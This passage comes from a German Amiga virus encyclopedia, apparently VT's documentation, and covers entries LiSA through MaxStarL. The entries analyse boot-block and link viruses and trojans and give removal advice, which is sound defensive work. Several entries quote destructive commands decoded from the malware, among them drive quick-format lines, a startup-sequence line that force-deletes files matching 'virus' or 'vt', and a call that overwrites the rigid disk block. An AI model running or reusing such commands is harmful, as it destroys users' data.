Loeschversuch DOS-Fehler. Entfernen Sie dann bitte die Zeile aus der s-seq und booten Sie neu. Da das VirusPrg nicht mehr aktiviert wird, koennen keine locks mehr entstehen und das Loeschen der Virus-Files MUSS moeglich sein. Fileerkennung mit VT getestet: 18.10.92 Fileerkennung gepackt mit VT getestet: 01.12.93 VT versucht auch .info und .fastdir zu loeschen. Geht aber nicht, wenn locks vorhanden sind. Speichererkennung mit VT getestet: 01.12.93 VT versucht den Process abzuschalten. In VT/Listen/Tasks darf "Background CLI [c:pxy]" nicht mehr auftauchen. Sie muessen aller- dings mit einem GURU rechnen. Lieber ist es mir, wenn Sie in VT/Tools einen KReset ausloesen !!!!! - LibSearcher.BB-Virus BB Stand: 23.08.94 Einige AntiVirusPrge erkennen einen Unkown-Virus. ( (1) oder (2) ) Das stimmt NICHT. VT erkennt Noboot (seit 02.11.90 !!!!) Lesen Sie bitte nach bei VT-andere.BB unter Noboot. Danke Vielleicht aendern die anderen AntiVirusPrge die Meldung beim naechsten Update. - LinkEm-Link File Lauffaehigkeit: wahrscheinlich nur KS1.3 VT glaubt ein File gefunden zu haben, bei dem mehrere Files mit dem Programm LinkEm zusammengesetzt wurden. VT empfiehlt Loeschen - LiSA-2.0-Trojan Zerstoerung Keine verbogenen Vektoren Nicht Resetfest 68040: Ja Bekannte Filenamen: - 020_Upgrader.exe L: 1660 Bytes - 020_Upgrader.dat (unwichtig) Nach FileID sollen Files im C-Verz. nachgebessert werden. In Wahrheit werden die Files in C: mit ABSICHT zerstoert. Es gibt KEINE Rettung. z.B. Addbuffers: vorher: nachher: 00: 000003f3 00000000 ........ : 284c6953 415e4655 (LiSA^FU 08: 00000001 00000000 ........ : 434b5550 2076322e CKUP v2. 10: 00000000 00000066 .......f : 4f206279 204e6f4e O by NoN 18: 000003e9 00000066 .......f : 616d652f 4c697361 ame/Lisa 20: 4e55ffdc 48e73332 NU..H.32 : 2955ffdc 48e73332 )U..H.32 Es handelt sich um ein Scriptfile, das mit einem Programm in ein ausfuehrbares File umgewandelt wurde. Ablauf: - RexxMast MUSS geladen sein. - Das File decodiert sich selbst - Es werden zwei Files in RAM: angelegt: - Upgrade.dat (ist das delete-file aus c:) - UpDate.temp (ist eine Liste mit den Files in c:) - Die Liste wird durchlaufen und in jedes File an den Anfang ein Text geschrieben. - Nach der Fertig-Meldung sollen Sie einen Reset ausfuehren. VT bietet fuer 020_Upgrader.exe nur Loeschen an. VT bietet fuer defekte Files in c: nur Loeschen an. Einfacher ist es, wenn Sie selbst das C-Verz. neu aufspielen. Hinweis 21.07.96: Ein anderes Antivirusprogramm erkennt im Moment in sehr vielen REXX-Programmen einen LiSA-Trojan. Dabei handelt es sich sehr haeufig um FEHL-Erkennungen. Im Juli 96 ist bisher nur EIN ECHTER Trojan (Name siehe oben) bekannt. Ich gehe davon aus, dass beim naechten Update der Fehler behoben sein wird. - LiSA-3.0-Trojan Zerstoerung anderer moeglicher Name: ScanEbola97 Keine verbogenen Vektoren Nicht Resetfest 68040: Ja Bekannte Filenamen: - ScanEbola97 L: 7004 Bytes Nach FileID: ScanEbola97: Scans your hard-drive for the Ebola97-virus. In Wahrheit werden bei ALLEN (!!!!) Files auf SYS: die ersten 16 Bytes veraendert. z.B. Dir: vorher: nachher: 00: 000003f3 00000000 ........ : 4c695341 20465543 LiSA FUC 08: 00000001 00000000 ........ : 4b555020 76332e30 KUP v3.0 10: 00000000 00000353 .......S : 00000000 00000353 .......S 18: 000003e9 00000353 .......S : 000003e9 00000353 .......S Da nur wenige Bytes veraendert werden, kann VT versuchen, aus- fuehrbare Files zu retten. Bei Daten-Files (.info, lha usw.) ist KEINE (!!!!) Rettung durch VT moeglich. Ob sich der Zeitaufwand lohnt muessen Sie selbst entscheiden. Ich habe fuer eine 270MB Syquest zwei Tage gebraucht. Bitte installieren Sie unbedingt zuerst die Workbench neu. Es werden damit schon viele Files wieder brauchbar. Danach gehen Sie bitte mit Sp-File-Sp und DirFTest Unterverzeichnis fuer Unterverzeichnis durch. Bei Data-Files ersetzt VT das "L" nach der Erkennung durch ";" also ";iSA". Manchmal koennen Sie solche Files (z.B. startup- sequence) noch durch Nacharbeit mit einem Editor retten. Fuer Icons usw. dagegen kenne ich keine Loesung. - Little Sven BB anderer Name: Cameleon, Chameleon BB ist codiert (immer neu !!). Ein Teil der Codierung: eor.b d1,(a0)+ Decodiert ist im Speicher zu lesen: The Curse of Little Sven! Cool, BeginIo, Supervisor, DisplayAlert im Programm dann: DoIo, FreeSignal Vermehrung: BB Schaeden: - Codiert FileDatenBloecke Kennung: $ABCD0008 (Langwort 0 eines Blocks) Die Programme laufen, solange Little Sven im Speicher aktiv ist. Abhilfe: VT kann diese Datenbloecke decodieren. Falls Sie also beim FileTest oder BlockKetteTest den Requester Little Sven erhalten, brechen Sie bitte ab und starten BlockITest . - Verschiebt den Original-Bootblock codiert nach Block2+3. VT kann dies rueckgaengig machen (klicken Sie auf O-BB. Dieses Gadget war frueher Lam3 und schreiben Sie den BB zurueck). A B E R !!!!!!!! Falls Block 2+3 vorher von einem File belegt war, so wurden durch das Virusprogramm 2 Datenbloecke zerstoert. Das File ist unbrauchbar. Es ist KEINE Rettung moeglich. VT sollte bei BlockKetteTest b.T.Data Block 2 zeigen. Oeffnen Sie den FileRequester (Sp-File-Sp) und loeschen Sie das File. - Enthaelt eine Routine, die 80 Steps nach innen ausfuehrt und dabei Daten schreibt. Diese Routine habe ich NICHT erreicht bei Tests. Alle Daten auf der Disk waeren dann unbrauchbar ??? Wird erzeugt beim Starten von XCopyPro V6.5 (Laenge:28336) und kopiert sich dann weiter. Hinweis: im April 92 lag die OrigVersionsNr. von Xcopy erst bei 5.2x (glaub ich). Gefunden in: xcopy65e.lha Laenge: 25360 - LoadWB-DFF006 File loeschen Im File ist zu lesen: 41f900df f0065210 10100200 000f6604 A.....R.......f. ^^^^^^^ 206c6f61 64776220 33382e39 20283330 loadwb 38.9 (30 2e332e39 32290a0d 0000776f 726b6265 .3.92)....workbe Dieses DFF006 kommt in meinem LoadWB NICHT vor. Empfehlung deshalb loeschen. - LOBOsimple-Virus Linkvirus Namensbegruendung: Im decodierten LinkTeil ist zu lesen: ffff4e75 4e7a0801 4e734454 00000000 ..NuNz..NsDT.... ;.... 2f480006 41fa050e 2081205f 4e733e4c /H..A... . _Ns>L 4f424f73 696d706c 653c4cdf 4eb900f9 OBOsimple<L.N... ;.... 7fff4a80 4e752323 506c695a 20646f6e .J.Nu##PliZ don 74207368 6f6f7421 20492061 6d204e4f t shoot! I am NO 54206120 56495255 53212323 536e6f6f T a VIRUS!##Snoo 70446f73 000041fa 04164c90 00ff6100 pDos..A...L...a. ;.... 00086100 03604e75 3e62794d 415a4539 ..a..`Nu>byMAZE9 363c6100 6<a. Fileverlaengerung: #1912 Bytes Nicht Resetfest Verbogene Vektoren: LoadSeg und TRAP1 Speicherverankerung: - Suche nach SnoopDos und DT (Debugger ??) siehe auch Hinweis falls gefunden, dann Ende - Loadseg schon verbogen $4E41 - Loadseg wird verbogen und zwar ins ROM - im ROM wird der TRAP1-Befehl gesucht 4e41 = "NA" 4e5d4e75 4e414d45 2c535452 494e472f N]NuNAME,STRING/ ^^^^ ^^ - $84 oder VBR+$84 wird verbogen Linkvorgang: - mit LoadSeg und TRAP1 - Medium validated - keine Disk (zuwenig Gesamtbloecke) - mind. #30 Block frei - Filename enthaelt nicht ".", "-", "!", "VIR" oder "vir" - Das Virusteil codiert sich immer neu mit $DFF006 - Link als neuer erster Hunk ($1DA) vor das Originalfile Es muessen also die anderen Hunks nachbearbeitet werden. Da das Virusteil nicht sehr viele Hunktypen kennt, ent- stehen auch defekte Files (bei Tests nachgewiesen) . Hinweis eines Users Nov.98: Danke Bei DT handelt es sich sicherlich um DOSTrace von Peter Stuer (z.B. auf der Meeting_Pearls_III:Pearls/debug/Snooper/DOSTrace oder im AmiNet unter util/moni zu finden), weil: 1. DT ist im Prinzip das selbe wie SnoopDos 2. Der Filename (und somit der Taskname) von DOSTrace lautet im Originalarchiv DT - LOBOweird-Inst. Installer Ein uncodierter LOBOweird-Virus Rest siehe bei LOBOweird - LOBOweird-Virus Linkvirus Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 4c4f424f 77656972 642e48e7 808041fa LOBOweird.H...A. ;.... 4e732041 4e54492d 56495220 50415443 Ns ANTI-VIR PATC 48206279 204d415a 45273937 21204eb9 H by MAZE'97! N. 6<a. Fileverlaengerung: mind. #2100 Bytes Nicht Resetfest Verbogene Vektoren: LoadSeg und TRAP (soll jetzt variabel sein) Speicherverankerung: - "LOBO" wird nicht gefunden - Loadseg wird verbogen und zwar ins ROM - im ROM wird der TRAP-Befehl gesucht. Der Trap soll jetzt variabel sein. Es wird mit TRAP0 ($4e40) begonnen. In all meinen ROMs wird aber erst TRAP1 (siehe oben bei LOBOsimple) gefunden. - es soll also ab $80 oder VBR+$80 variabel verbogen werden. Bei mir wird also immer $84 oder VBR+$84 verbogen. Linkvorgang: - mit LoadSeg und TRAP - File groesser #7913 Bytes - File kleiner #255600 Bytes - Medium validated - keine Disk (mind. #91978 Bloecke) - mind #30 Block frei - Filename enthaelt nicht ".", "-", "!", "VIR" oder "vir" - Das Virusteil codiert sich immer neu mit $DFF006 - Es entstehen immer verseuchte Files mit 2 Hunks Der 1. Hunk enthaelt das Virusteil. Der 2.Hunk ist das ganze Originalfile. Leider kann man den 2.Hunk nicht einfach zurueck- schreiben, da 8 Bytes im Originalfile codiert werden. Es muss im Virusteil das Codier-Langwort gesucht werden. Dieses LW aendert sich immer in Abhaengigkeit von $DFF006. - LOGIC BOMB anderer Name: PARADOX I s.d. - LOOK-BBS-Trojan Name uebernommen nicht nachvollziehbar im Speicher Laenge gepackt: 1392 Bytes Laenge entpackt: 1456 Bytes Verbogener Vektor: Cool auf Endlos-Farbroutine NACH DisplayAlert Keine Vermehrungsroutine Wahrscheinlich von CONMAN. Im entpackten File ist zu lesen: 00000000 00536e6f 6f70446f 7300646f .....SnoopDos.do 732e6c69 62726172 79004155 583a0042 s.library.AUX:.B 42533a55 5345522e 44415441 00434f4e BS:USER.DATA.CON 3a302f30 2f333230 2f313030 2f524541 :0/0/320/100/REA 444d4521 004e494c 3a00433a 4d4f554e DME!.NIL:.C:MOUN 54204155 583a0000 0c200a20 0a1b5b32 T AUX:... . ..[2 Gefahr nur fuer Mailbox-Betreiber. Empfehlung loeschen. Sucht nach SnoopDos. Versucht AUX anzumelden Nein dann Ende Schreibt aus USER.DATA Teile nach AUX: Wahrscheinlich ein Einbruchsversuch. Oeffnet zur Taeuschung ein Fenster und gibt Reset-Text aus: 0a1b5b32 3b316d1b 5b3b3432 6d20506c ..[2;1m.[;42m Pl 65617365 20576169 74202121 21202020 ease Wait !!! 1b5b306d 0a1b5b32 3b316d1b 5b3b3432 .[0m..[2;1m.[;42 6d204c6f 6164696e 67204441 54412e2e m Loading DATA.. ;..... 534f5252 59204d49 5353494e 47204441 SORRY MISSING DA 54412046 494c4520 32202120 504c4541 TA FILE 2 ! PLEA 53452052 45424f4f 54202121 21201b5b SE REBOOT !!! .[ Wem das noch nicht reicht, bekommt noch einen DisplayAlert Text angeboten: FATAL HARDWARE ERROR usw. und eine Endlos- schleife (s.o.) . - LOOP-COMBO-Virus File Laenge: 1848 Bytes Auf Disk als Disk-Validator getarnt KS 1.3: ja KS 2.0: nein Vermehrung: nein reines Zerstoerungsprogramm Im File ist an $490 uncodiert zu lesen: 00242429 000c222a 02d07041 6e642041 .$$).."*..pAnd A 6761696e 20467563 6b656420 75702100 gain Fucked up!. Decodiert mit eori.b d1,(a1)+ ist im File zu lesen: 144d4954 204d4952 204e4943 48542c20 .MIT MIR NICHT, 44552041 46464520 21212121 21000100 DU AFFE !!!!!... 0a1e5645 52535543 4860204c 49454245 ..VERSUCH` LIEBE 52204d41 4c204549 4e454e20 4c4f4f50 R MAL EINEN LOOP 2d434f4d 424f2121 0001000a 284f4445 -COMBO!!....(ODE usw. Schaden: Sobald unter KS 1.3 eine Disk mit ungueltigem BitMapZeiger eingelegt wird, wird das Teil gestartet. Kopfstep Disk danach bad Versuchen Sie mit Disksalve noch etwas zu retten. Textausgabe mit DisplayAlert . Loeschen Sie bitte unbedingt das Teil auch wenn SIE schon KS 2.0 oder mehr haben. Falls Sie so eine Disk weitergeben kann sonst ihr Bekannter mit Ks1.3 eine boese Ueberraschung erleben. Spielen Sie bitte auch einen sauberen Disk-Validator auf. Danke - LOVEMACHINE-Virus BB Warhawk-Clone s.u. 44452042 59202020 4c204f20 56204520 DE BY L O V E 4d204120 43204820 49204e20 45273930 M A C H I N E'90 - LSD! (noch ein SCA!) - lummin-Virus File siehe unten bei XaCa-Virus - LUPO-Virus File Nano-Clone s.u. Laenge PP gepackt: 1420 Bytes Laenge ungepackt : 1484 Bytes Name des Files VOR der Vermehrung wahrscheinlich memclear Namensbegruendung: s.u. Unterschiede zu Nano: - anderer Text - unsichtbarer Filename soll " " sein Eine Meisterleistung !!!!! 3a200000 00000000 3a732f73 74617274 : ......:s/start ^^^^^^ 75702d73 65717565 6e636500 20000000 up-sequence. ... 0000200a 00c80a2e 2e2e6120 6e657720 .. .......a new 76697275 73207275 6e6e6572 2066726f virus runner fro 6d204c20 55205020 4f202120 2000140a m L U P O ! ... ^^ = ": ",0 = unsichtbarer Filename fuer Root Die Vermehrung von LUPO findet UNGEPACKT statt !!! Weiterhin ist bemerkenswert, dass in die startup-sequence eine Zeile mit einem Leerzeichen und return eingebaut werden soll. Nach meinem Wissensstand wird ein normales Leerzeichen in der startup- sequence nicht als Filename , sondern als Leerzeile behandelt. Also wird das vermehrte Virusteil NIE aufgerufen. Speichererkennung von VT: als LUPO Fileerkennung von VT : als NANO mehr ist die Sache nicht wert. - LURAD-Trojan Zerstoerung anderer moeglicher Name: HDprotect-Trojan Filename:hdprotect Filelaenge gepackt: 3984 Bytes Filelaenge entpackt: 20200 Bytes Entpackt ist im File zu lesen: 756e203e 4e494c3a 20666f72 6d617420 un >NIL: format 64726976 65206468 303a206e 616d6520 drive dh0: name 4c555241 44007275 6e203e4e 494c3a20 LURAD.run >NIL: 666f726d 61742064 72697665 20646831 format drive dh1 3a206e61 6d65204c 55524144 20515549 : name LURAD QUI 434b0072 756e203e 4e494c3a 20666f72 CK.run >NIL: for 6d617420 64726976 65206468 323a206e mat drive dh2: n 616d6520 484f525f 554e4745 20515549 ame HOR_UNGE QUI 434b0057 6f726b69 6e67206f 6e204448 CK.Working on DH ;.... 33336d48 61726464 69736b20 70726f74 33mHarddisk prot 65637420 76657273 696f6e20 362e3234 ect version 6.24 Versucht durch Textausgabe in Shell zu taeuschen. Soll dh0, dh1 und dh2 formatieren. - LVirus-$F8 Linkvirus Namensbegruendung: Fileverlaengerung #248 = $F8, da kein Text im Linkteil. Fileverlaengerung: #248 Bytes Nicht Resetfest Verbogener Vektor: DosWrite Fehlerquelle: kein Test auf KS1.3 (DosWrite) Speicherverankerung: - Test ob schon im Speicher - DosWrite wird verbogen Linkvorgang: - File noch nicht verseucht - CodeHunk wird gefunden ($3E9) - 1.Hunk nicht groesser als #8192 (wg. Sprung) - Das erste LW des 1.Hunks wird durch bsr Virus ($6100wxyz) ersetzt. - Link hinter den 1.Hunk VT versucht Write im Speicher zurueckzusetzen. VT versucht den Fileausbau. - LZ-Virus Linkvirus, verlaengert ein File um 400 Bytes testet Hauptversionsnummer der dos.library, falls groesser 34 oder kleiner 33 keine Aktivierung, verbiegt GlobVec 06 = Write linkt sich hinter CodeHunk (meist 1.) und ersetzt z.B. $4e75 = rts durch $6004 = bra.s 4 oder $4eee = jmp durch $60XY Muss deshalb HunkAnzahl nicht veraendern, sondern nur die Anzahl der Langwoerter des befallenen Hunks um $64 erhoehen. Bedingungen fuer ein File: 0.LW = $3f3 (ausfuehrbar) 1.LW = 0 (keine Resident-Libs zu laden) (kein Overlay) es wird ein CodeHunk gefunden $3e9 der gefundene CodeHunk ist laenger als #1000 Bytes Ursprung: (Geruecht 14.07.91) SOLL ein LZ-Entpackungsprogramm sein ???? (hab ich nicht) Hinweis: MehrfachLinks an ein File gefunden !!! Hinweis 01.09.92: Ab VT2.44 sollten mehrere LZ-Virus-Links ans glei- che File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke - M_CHAT-Trojan File Laenge ungepackt: 13492 Bytes Von der Definition kein Virus, da keine Vermehrungsroutine. Keine verbogenen Vektoren. Braucht AmiExpress-Port, sonst Ausgabe (bei mir) Couldn't create reply port und Programmende. Im lha-Archiv liegt das Programm ungepackt. Durch das Doc-File im lha-Archiv wird ein Taeuschungsversuch unter- nommen: ============================================================================= || MULTINODE CHAT DOOR VERSION V2.3 [BUGFIXED] FROM PORTAX OF WIBBLE || ============================================================================= What is it?! ------------ Well M_Chat Is a MultiChat Node Door , Quite simple actually. Installation! ------------- M_Chat is VERY easy to install! Make sure you have you boards main dir. assigned as BBS: And your doors dir. assigned as: DOORS: Just copy the actual proggie: M_Chat to your DOORS: dir. Add the following line to your BBS:COMMANDS/CUSTOMCOMMANDS or BBS.CMD file like this: ---------------------------cut here! *CHAT XM010DOORS:M_Chat ---------------------------cut here! This is a great Multi_Node chat door for Amiexpress -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.- Signed: PORT/\X of W|BBlE ======= ================= Call Fraxion Pleasure at ++31/45/678452 (16.8k Dual!) Im File ist zu lesen: 316d7c7c 2020204d 554c5449 4e4f4445 1m|| MULTINODE 20434841 5420444f 4f522056 45525349 CHAT DOOR VERSI 4f4e2056 322e3320 1b5b3337 6d5b4255 ON V2.3 .[37m[BU 47464958 45445d1b 5b303b33 326d201b GFIXED].[0;32m . 5b316d46 524f4d20 1b5b3335 6d504f52 [1mFROM .[35mPOR 54415820 4f462057 4942424c 45202020 TAX OF WIBBLE 20201b5b 33316d7c 7c001b5b 303b316d .[31m||..[0;1m 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================ 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================ 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================ 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================ 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d000000 =============... 00001b5b 306d2020 57616974 696e6721 ...[0m Waiting! 21210000 72616d3a 63720000 7700636f !!..ram:cr..w.co 70792063 3a666f72 6d617420 72616d3a py c:format ram: 66660000 636f7079 20737973 3a737973 ff..copy sys:sys 74656d2f 666f726d 61742072 616d3a66 tem/format ram:f 66007261 6d3a6666 20647269 76652064 f.ram:ff drive d 68303a20 6e616d65 20484148 41484120 h0: name HAHAHA 6e6f6963 6f6e7320 71756963 6b203c20 noicons quick < 72616d3a 63720000 72616d3a 66662064 ram:cr..ram:ff d 72697665 20737973 74656d32 2e303a20 rive system2.0: 6e616d65 20484148 41484120 6e6f6963 name HAHAHA noic 6f6e7320 71756963 6b203c20 72616d3a ons quick < ram: Schadensverlauf: Nach Programmaufruf wird der format-Befehl mit neuem Namen "ff" nach ram: kopiert. Danach beginnt die Suche nach Partitions-Namen und LWen: dh0:, system2.0:, work:, dh1:, bbs:, df0:, df1:, dh2:, dh3:, dh4:, df2:, HD:, df0: Gefundene LWe werden schnell formatiert mit z.B.: ram:ff drive dh0: name HAHAHA noicons quick D.h. wahrscheinlich koennen Sie mit Disksalv2 ihre Partition retten, da mit dem Parameter quick nur der BB, Root und Bitmap neu geschrieben werden. Am Schluss soll ausgegeben werden: " Sorry ",0 ", the BBS is not registred",0 VT2.57: (26.09.93) Nur loeschen moeglich, da das Teil in das Chat-Prg. eingebaut ist und deshalb nicht durch Ausbau eines Hunks entfernt wer- den kann. Nachtrag 03.94: Von MultiChat ist ein Namensaenderung aufgetaucht. Name: ATX-Chat Laenge: 13492 Bytes Nicht einmal die Texte im File wurden geaendert. Wird von VT erkannt und sollte geloescht werden. Rest siehe oben Doc-File-Auszug: MULTINODE CHAT DOOR VERSION V3.0 FROM TRASH/ANTHROX WELL THIS IS THE NEW 32 MULTICHAT DOOR FROM TRASH/ANTHROX.YOU NEED /X 3.32 OR HIGER. ;.... - MAAS-BB-Virus Warhawk-Clone nur Textaenderung, eine echte Meisterleistung siehe bei Warhawk im BB ist zu lesen: 4d41 41532d45 58544552 MAAS-EXTER 4d494e41 544f523a 20544849 53204953 MINATOR: THIS IS - MACK-Trojan siehe unten bei WAWE-Trojan - MAD (ForpibClone) nur Text geaendert s.o. - MAD II nur KS1.2, da absoluter DoIo-ROM-Einsprung Cool, DoIo, KickTag, KickCheckSum, im Speicher immer $7FB00 im BB sichtbar: MAD II VIRUS is better usw. Fordert trackdisk.device NICHT Vermehrung: ueber BB Sobald der Inhalt des Zaehlers groesser $D ist, wird in eine DiskStepRoutine verzweigt. Da diese falsch programmiert und somit nicht funktionsfaehig ist, wird nur der Bildschirm dunkel. Hinweis: es existiert ein MAD II, bei dem der MAD-Text mit sinn- losen Buchstabenfolgen (z.B. DAFGderFEHY) ueberschrieben wurde. Wird von VT als MAD II erkannt. Clone: KHOMEINI-Virus s.o. - MAD IIa wie MAD II nur jetzt Warm fuer Cool und andere Source- Aenderungen z.B. $2a in $2e usw. Ergebnis bleibt gleich (Anfaenger bitte bleibt beim Joystick !!!) - MAD2-TAI2-Virus BB Clone s.o. Text geaendert (rueckwaerts) eine Meisterleistung 6c696272 61727900 73696874 20736920 library.siht si 65687420 646e6f63 65732073 75726976 eht dnoces suriv 20666f20 65687420 72656d61 6c69746e fo eht remalitn 41206e6f 69746172 6f70726f 4320492e A noitaroproC I. 412e542e 20202068 74616564 206f7420 A.T. htaed ot 6c6c6120 7372656d 616c2c20 69697269 lla sremal, iiri 7620646e 61206969 72697620 7265766f v dna iiriv revo 20756f79 20402054 2e412e49 2e204261 uoy @ T.A.I. Ba 64206469 736b7320 3a292929 29292929 d disks :))))))) - MAD III nur KS1.2 Byte-Warrior-Clone s.o. geaendert: DASA0.2 in MAD.III 4d414400 4949493c 000813fc 000200bf MAD.III<........ - MAD IIIB nur KS1.2 Byte-Warrior-Clone s.o. geaendert: DASA0.2 in MAD III 4d414420 4949493c 000813fc 000200bf MAD III<........ Der Unterschied ist 00 zu 20 . Desweiteren scheint unklar gewesen zu sein, dass es sich bei DASA0.2 nicht um einen Text, sondern um eine Befehlsfolge handelt. - MAD IV LamerAltClone s.o. Unterschied: statt mit Lamer! soll der zerstoerte Block mit MAD gefuellt werden. - MAFIA-Virus BB Dotty-Clone s.o. - MagiCall es ist KEIN Virus wird deshalb von VT nicht erkannt Es ist ein MagiCall (Laenge: 149664) aufgetaucht, an das am Anfang ein einfacher Hunk (mit Namen) angehaengt wur- de. Wenn Sie MagiCall aus dem Cli starten, passiert nichts. Starten Sie dagegen mit dem Icon, so beschwert sich MagiCall mit DisplayAlert ueber die falsche Hunkanzahl. Das Programm selbst enthaelt nach meiner Meinung keinen Virus. - MagicWB-Gag File KEIN Virus KEINE verbogenen Vektoren KEINE Vermehrung Empfehlung: Loeschen Filename: in s: mti.data Laenge: 88585 Bytes Es handelt sich um einen UNDOKUMENTIERTEN Gag, der NICHT bei jedem Bootvorgang aktiviert wird. Selbst in verschiedenen Netzen wurde ein Virus vermutet !!! ----- Ausriss ------- Ich hab da ein kleine Virenprob, glaub ich !! In unregelmaeszigen Abstaenden erscheint beim Hochfahren des Rechners eine Grafik und Sound, danach Absturz des Rechners, beim erneuten Hochfahren wieder alles roger. Vielleicht kennt einer das Teil: Merkmale: Grafik ein Dreieck und Dolby Surround (THX) mit ^^^^^^^^ Soundunterstuetzung. Kein Virenscanner konnte einen Virus entdecken !! In welchem Programm steckt der drin ?? Ich bin dankbar fuer jeden Hinweis, denn das nervt auf die Dauer !! ----- Ausriss-Ende ------ Die verschiedenen Anfrager konnten beruhigt werden. ABER !!!! Haben die Programmierer darueber nachgedacht, welchen Schreck ein Anfaenger bekommt. Die Anfaenger haben wahrscheinlich KEIN Modem. Wer hilft diesen Personen ????? - MakroTroj-BEOL5 Text und Icon Namensbegruendung: Im Ram wird ein File BEOL5 angelegt Verbogene Vektoren: nein Resetfest: Nein Ablauf: Ueber das Icon wird Multiview aufgerufen. Es wird ein Text angezeigt, der 3 Gadgets enthaelt. Diese Gadgets erhalte ich nur, wenn ich Multiview von WB3.1 verwende. Arbeite ich mit Multiview von WB3.0, dann werden bei mir die Gadgets nicht an- gezeigt. Klicken Sie auf eines dieser Gadgets, so wird die startup-sequence (im Ram:BEOL5) geaendert. startup vorher: ; $VER: Startup-Sequence_HD 40.4 (31.8.93) ;..... startup nachher: delete >NIL: (#?virus#?|#?vt#?) ALL FORCE QUIET echo I am a perverse teeny-fucker, I am not worth living! ; $VER: Startup-Sequence_HD 40.4 (31.8.93) ;..... Beim naechsten Reset werden alle Programme UND Dirs geloescht, die die Zeichenabfolge (s.o.) enthalten. Danach wird ein Text im Cli ausgegeben. VT sollte das Ausloesefile und die Veraenderung in der startup- sequence erkennen und Loeschen oder Ausbau anbieten. Sie koennen die Zeilen in der Startup-sequence natuerlich auch mit einem Editor ihrer Wahl ausschneiden. - MALLANDER VIRUS V1.0 BB Block 0-3 auch KS2.04, braucht 1Mb Chip entgegen anderen Behauptungen: laeuft AUCH mit KS1.3 !!! KickTag, KickCheckSum, DoIo, immer ab 7F800 anderer Name: DERK ist 2x im BB zu lesen fordert trackdisk.device NICHT holt 4 Bloecke: Block 0 u. 1 = Virus Block 2 u. 3 = OrigBB nicht codiert Vermehrung und Schaeden: speichert 4 Blocke ab, d.h. ein File das Block 2 u. 3 belegt, wird zerstoert. belegt immer $4000 ChipSpeicher neu sobald kein Chip mehr frei: decodiert einen BB-Teil mit eori.w #$aaaa,(a0)+ (auch intuition.library) und gibt den Text mit DisplayAlert aus. Danach Reset = jmp FC0000 J.D. MALLANDER VIRUS V. 1.0 I need lots of money - buy my cool pd serie 'action power' Hinweis: es gibt KEINE 2 DERK, sondern einer enthaelt Vektoren von KS1.3, der andere von KS2.04 (Beweis: VT vergl.). - MASTER-BBS-Trojan Name uebernommen nicht nachvollziehbar im Speicher Laenge gepackt: 1652 Bytes Laenge entpackt: 2300 Bytes Keine verbogenen Vektoren Keine Vermehrungsroutine Im entpackten File ist zu lesen: 646f732e 6c696272 61727900 4e494c3a dos.library.NIL: 00424253 3a555345 522e4b45 59530042 .BBS:USER.KEYS.B 42533a55 5345522e 4b455953 004e494c BS:USER.KEYS.NIL 3a004242 533a5553 45522e44 41544100 :.BBS:USER.DATA. 4242533a 55534552 2e444154 4100536e BBS:USER.DATA.Sn 6f6f7044 6f730041 43500061 63700000 oopDos.ACP.acp.. 4d414749 43202020 00000000 00000000 MAGIC ........ Gefahr nur fuer Mailbox-Betreiber. Empfehlung loeschen. Soll CONMAN usw. nach $7C000 schreiben. Sucht nach SnoopDos Sucht nach ACP-task (acp auch) Nein dann Ende Schreibt in USER.DATA und USER.KEYS Teile des eigenen Files mit MAGIC usw. . Wahrscheinlich eine Zugangsberechtigung. Clone 07.01.94: Filename Master-Who Laenge: 4844 Bytes mitgelieferter Doc-Auszug: ***************************** * * * MASTER-WHO V1.1 * * * ***************************** Featuring --------- -Automatically determines how many nodes are running (up to 9 nodes). -Shows Node number , Name , Location and Action. -The fastest who door available (100% 68000 Assembler). -The shortest who door available. -Tracks even loss of carriers. -Show full action in your Kickstart workbench 1.3 2.0 -Show download files usw. In Wirklichkeit ist es ein Master-BBS-Trojan. Wurde mit 4eb9-4ef9-Link an ein NUTZLOSES Programm angebracht. Von der Nutzlosigkeit koennen Sie sich selbst ueberzeugen, wenn Sie im Filerequester den 1.Hunk abschalten. VT bietet deshalb nur loeschen an. - MAX BB SCA-Clone s.u. - Maxsafe Trojan Verbogene Vektoren: keine Nicht Resetfest Archivname: MAXSAFE.LHA 13065 Bytes Filename: maxsafe 5008 Bytes nach readme: Max door control is a program I wrote about a year ago to help me sort out bugs in max, It uses the maxpacker.library and monitors all functions called by max, It creates an out put text file showing you any possible problems with any function 34 door. Notwendige libs: hbasic2.lib, hisoftbasic.lib und maxpacker.lib (die wird mitgeliefert und ist in Wirklichkeit eine pp.lib) Ohne diese Libs Abbruch ohne Schadensfunktion. Ablauf: In Ram: werden vier Files erzeugt: runit 9012 Bytes runit.info 338 Bytes YES 1 Byte YES.info 338 Bytes Hinweis: runit ist in Wirklichkeit ein Nutzprg. (ReadRDB v05.) und wird hier nur fuer eine Zerstoerungsfunktion miss- braucht. Weiterhin wird s/startup-sequence geoeffnet. Nach einigen Sekunden wird OHNE Reset ausgefuehrt: execute ram:runit < ram:yes d scsi.device Dies ist die eigentliche Schadensfunktion. Der Inhalt der startup-sequence wird ab Block 0 in den Rigid- Bereich der Unit 0 geschrieben. Der Rest des Rigidbereichs wurde bei mir mit Nullen aufgefuellt. Es sind nur UNIT 0 (1 keine Veraenderung) und nur Festplatten, die mit scsi.device angesprochen werden, betroffen (also z.B. keine Zerstoerung bei gvpscsi.device). vorher: pZyl 0 Bl 0 RDSK-Bl ChS: ok 00: 5244534b 00000040 334d4846 00000007 RDSK...@3MHF.... 10: 00000200 00000012 ffffffff 00000001 ................ nachher: pZyl 0 Bl 0 00: 0a3b2053 74617274 75702d53 65717565 .; Startup-Seque 10: 6e636520 666f7220 68617264 20647269 nce for hard dri Hinweis: Vielleicht sollten Sie doch einmal darueber nachdenken, den Rigid-Bereich Ihrer Festplatte mit VT/zeigeZyl/backup oder einem anderen Tool auf eine DISK (nur da ist es sinnvoll) zu sichern. Kopieren sie dann bitte auch den mount-Befehl und ein mountfile auf diese Disk. - MaxStarL.-Virus Bootblock Verbogene Vektoren: KickTag, DoIo, 